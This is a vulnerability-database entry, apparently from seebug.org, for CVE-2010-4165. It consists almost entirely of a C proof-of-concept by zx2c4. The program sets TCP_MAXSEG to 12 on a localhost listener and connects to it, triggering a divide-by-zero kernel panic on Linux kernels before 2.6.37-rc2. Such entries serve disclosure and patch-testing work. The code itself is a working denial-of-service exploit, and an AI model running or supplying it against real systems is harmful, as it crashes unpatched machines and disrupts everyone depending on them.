Linux Kernel < 2.6.37-rc2 TCP_MAXSEG Kernel Panic DoS

2014-07-0100:00:00

Root

www.seebug.org

0.0004 Low

EPSS

Percentile

0.4%

JSON

No description provided by source.


                                                /*
 * TCP_MAXSEG Kernel Panic DoS for Linux &#60; 2.6.37-rc2
 * by zx2c4
 *
 * This exploit triggers CVE-2010-4165, a divide by zero
 * error in net/ipv4/tcp.c. Because this is on the softirq
 * path, the kernel oopses and then completely dies with
 * no chance of recovery. It has been very reliable as a
 * DoS, but is not useful for triggering other bugs.
 *
 * -zx2c4, 28-2-2011
 */

#include &#60;stdio.h&#62;
#include &#60;string.h&#62;
#include &#60;sys/socket.h&#62;
#include &#60;net/if.h&#62;
#include &#60;arpa/inet.h&#62;
#include &#60;netinet/tcp.h&#62;

int main()
{
	struct sockaddr_in laddr;
	memset(&laddr, 0, sizeof(laddr));
	laddr.sin_family = AF_INET;
	laddr.sin_addr.s_addr = inet_addr(&#34;127.0.0.1&#34;);
	laddr.sin_port = htons(31337);
	int listener = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (listener &#60; 0) {
		printf(&#34;[-] Could not open listener.\n&#34;);
		return -1;
	}
	int val = 12;
	if (setsockopt(listener, IPPROTO_TCP, TCP_MAXSEG, &val, sizeof(val)) &#60; 0) {
		printf(&#34;[-] Could not set sockopt.\n&#34;);
		return -1;
	}
	if (bind(listener, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) &#60; 0) {
		printf(&#34;[-] Could not bind to address.\n&#34;);
		return -1;
	}
	if (listen(listener, 1) &#60; 0) {
		printf(&#34;[-] Could not listen.\n&#34;);
		return -1;
	}
	int hello = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (hello &#60; 0) {
		printf(&#34;[-] Could not open connector.\n&#34;);
		return -1;
	}
	if (connect(hello, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) &#60; 0) {
		printf(&#34;[-] Could not connect to listener.\n&#34;);
		return -1;
	}
	printf(&#34;[-] Connection did not trigger oops.\n&#34;);
	return 0;
}